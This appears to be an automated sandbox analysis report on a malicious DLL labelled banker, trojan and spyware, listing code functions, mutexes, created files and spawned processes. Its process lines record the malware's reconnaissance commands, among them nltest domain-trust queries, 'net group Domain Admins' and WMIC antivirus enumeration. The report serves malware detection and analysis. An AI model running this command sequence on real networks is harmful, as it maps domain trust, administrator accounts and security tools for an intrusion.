Source: C:\Windows\explorer.exe	Code function: 8_2_08851A7C	8_2_08851A7C
Source: C:\Windows\explorer.exe	Code function: 8_2_08852164	8_2_08852164
Source: C:\Windows\explorer.exe	Code function: 8_2_0E454B50	8_2_0E454B50
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4E9708	8_2_0E4E9708
Source: C:\Windows\explorer.exe	Code function: 8_2_0E46FE38	8_2_0E46FE38
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4B1ECC	8_2_0E4B1ECC
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4E0EC0	8_2_0E4E0EC0
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4A7EE8	8_2_0E4A7EE8
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4EAE84	8_2_0E4EAE84
Source: C:\Windows\explorer.exe	Code function: 8_2_0E45BEB8	8_2_0E45BEB8
Source: C:\Windows\explorer.exe	Code function: 8_2_0E499F68	8_2_0E499F68
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4CAF20	8_2_0E4CAF20
Source: C:\Windows\explorer.exe	Code function: 8_2_0E457FD0	8_2_0E457FD0
Source: C:\Windows\explorer.exe	Code function: 8_2_0E47FC72	8_2_0E47FC72
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4B7C14	8_2_0E4B7C14
Source: C:\Windows\explorer.exe	Code function: 8_2_0E459CBC	8_2_0E459CBC
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4C5D68	8_2_0E4C5D68
Source: C:\Windows\explorer.exe	Code function: 8_2_0E480D18	8_2_0E480D18
Source: C:\Windows\explorer.exe	Code function: 8_2_0E48EDE0	8_2_0E48EDE0
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4A8DF8	8_2_0E4A8DF8
Source: C:\Windows\explorer.exe	Code function: 8_2_0E479D94	8_2_0E479D94
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4E9D94	8_2_0E4E9D94
Source: C:\Windows\explorer.exe	Code function: 8_2_0E480A8A	8_2_0E480A8A
Source: C:\Windows\explorer.exe	Code function: 8_2_0E49EA84	8_2_0E49EA84
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4C0B54	8_2_0E4C0B54
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4D2B38	8_2_0E4D2B38
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4DDB34	8_2_0E4DDB34
Source: C:\Windows\explorer.exe	Code function: 8_2_0E49BB94	8_2_0E49BB94
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4EEBB8	8_2_0E4EEBB8
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4B7874	8_2_0E4B7874
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4A481C	8_2_0E4A481C
Source: C:\Windows\explorer.exe	Code function: 8_2_0E488824	8_2_0E488824
Source: C:\Windows\explorer.exe	Code function: 8_2_0E48D834	8_2_0E48D834
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4DD8B8	8_2_0E4DD8B8
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4C98B0	8_2_0E4C98B0
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4E4940	8_2_0E4E4940
Source: C:\Windows\explorer.exe	Code function: 8_2_0E45D9E4	8_2_0E45D9E4
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4C8980	8_2_0E4C8980
Source: C:\Windows\explorer.exe	Code function: 8_2_0E479650	8_2_0E479650
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4DD63C	8_2_0E4DD63C
Source: C:\Windows\explorer.exe	Code function: 8_2_0E475768	8_2_0E475768
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4C672C	8_2_0E4C672C
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4677E0	8_2_0E4677E0
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4B8788	8_2_0E4B8788
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4A7448	8_2_0E4A7448
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4AE45C	8_2_0E4AE45C
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4C2430	8_2_0E4C2430
Source: C:\Windows\explorer.exe	Code function: 8_2_0E49F4C4	8_2_0E49F4C4
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4B84D8	8_2_0E4B84D8
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4D94F0	8_2_0E4D94F0
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4B3498	8_2_0E4B3498
Source: C:\Windows\explorer.exe	Code function: 8_2_0E470540	8_2_0E470540
Source: C:\Windows\explorer.exe	Code function: 8_2_0E458568	8_2_0E458568
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4B4564	8_2_0E4B4564
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4C5534	8_2_0E4C5534
Source: C:\Windows\explorer.exe	Code function: 8_2_0E45453C	8_2_0E45453C
Source: C:\Windows\explorer.exe	Code function: 8_2_0E49B5D0	8_2_0E49B5D0
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4B05FC	8_2_0E4B05FC
Source: C:\Windows\explorer.exe	Code function: 8_2_0E47F5FB	8_2_0E47F5FB
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4805A0	8_2_0E4805A0
Source: C:\Windows\explorer.exe	Code function: 8_2_0E456358	8_2_0E456358
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4DB370	8_2_0E4DB370
Source: C:\Windows\explorer.exe	Code function: 8_2_0E45E31C	8_2_0E45E31C
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4983EC	8_2_0E4983EC
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4C73A0	8_2_0E4C73A0
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4BA048	8_2_0E4BA048
Source: C:\Windows\explorer.exe	Code function: 8_2_0E48E074	8_2_0E48E074
Source: C:\Windows\explorer.exe	Code function: 8_2_0E456078	8_2_0E456078
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4AF018	8_2_0E4AF018
Source: C:\Windows\explorer.exe	Code function: 8_2_0E476038	8_2_0E476038
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4970C0	8_2_0E4970C0
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4C0154	8_2_0E4C0154
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4B0114	8_2_0E4B0114
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4C4134	8_2_0E4C4134
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4B11CC	8_2_0E4B11CC
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4851C0	8_2_0E4851C0
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4801FB	8_2_0E4801FB
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4A318C	8_2_0E4A318C
Source: C:\Windows\explorer.exe	Code function: 8_2_0E46D19C	8_2_0E46D19C

Found potential string decryption / allocating functions

Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FF8A8DC9868 appears 296 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FF8A8D0F210 appears 62 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FF8A8DC9670 appears 61 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FF8A8D0C6C0 appears 198 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FF8A8D0ECA0 appears 394 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FF8A8CFE038 appears 69 times
Source: C:\Windows\explorer.exe	Code function: String function: 0E477D54 appears 31 times
Source: C:\Windows\explorer.exe	Code function: String function: 0E45E160 appears 147 times
Source: C:\Windows\explorer.exe	Code function: String function: 0E45D5A8 appears 35 times
Source: C:\Windows\explorer.exe	Code function: String function: 0E45D6E8 appears 52 times

Sample file is different than original file name gathered from version info

Source: wait.dll.dll

Binary or memory string: OriginalFilenamenvsvc32.exez- vs wait.dll.dll

Source: classification engine

Classification label: mal100.spre.bank.troj.spyw.evad.winDLL@70/7@7/4

Source: C:\Windows\System32\rundll32.exe

3_2_00007FF8A8D7CB80

Source: C:\Windows\System32\rundll32.exe

Code function: 3_3_00007DF4A9FC0000 CreateToolhelp32Snapshot,Process32First,CloseHandle,Process32Next,

3_3_00007DF4A9FC0000

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00007FF8A8D2C180 CoCreateInstance,StringFromGUID2,RegQueryInfoKeyW,RegCloseKey,RegQueryInfoKeyW,RegCloseKey,RegCloseKey,RegCloseKey,

3_2_00007FF8A8D2C180

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00007FF8A8CFEA34 LoadLibraryExW,LoadLibraryExW,FindResourceW,LoadResource,SizeofResource,MultiByteToWideChar,FreeLibrary,

3_2_00007FF8A8CFEA34

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\stkm[1].bin

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4124:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3744:120:WilError_03
Source: C:\Windows\System32\rundll32.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5412:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1776:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5996:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6444:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3948:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5252:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3480:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2568:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4276:120:WilError_03

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\Iyufla1.tmp

Jump to behavior

Source: wait.dll.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll64.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll64.exe

Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\wait.dll.dll,Jump

Source: Iyufla1.tmp.8.dr, Alakow3.tmp.8.dr

Source: unknown	Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\wait.dll.dll"
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",#1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\wait.dll.dll,Jump
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",#1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",Jump
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c ipconfig /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\systeminfo.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net view /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\wbem\WMIC.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: C:\Windows\System32\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net config workstation
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName \| findstr /V /B /C:displayName \|\| echo No Antivirus installed
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c whoami /groups
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami /groups
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\wait.dll.dll,Jump	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",Jump	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",#1	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c ipconfig /all	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c systeminfo	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net view /all /domain	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net view /all	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\wbem\WMIC.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net config workstation	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName \| findstr /V /B /C:displayName \|\| echo No Antivirus installed	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c whoami /groups	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami /groups

Source: C:\Windows\System32\loaddll64.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: esscli.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\nltest.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\nltest.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\nltest.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net.exe	Section loaded: browcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net.exe	Section loaded: browcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\net1.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
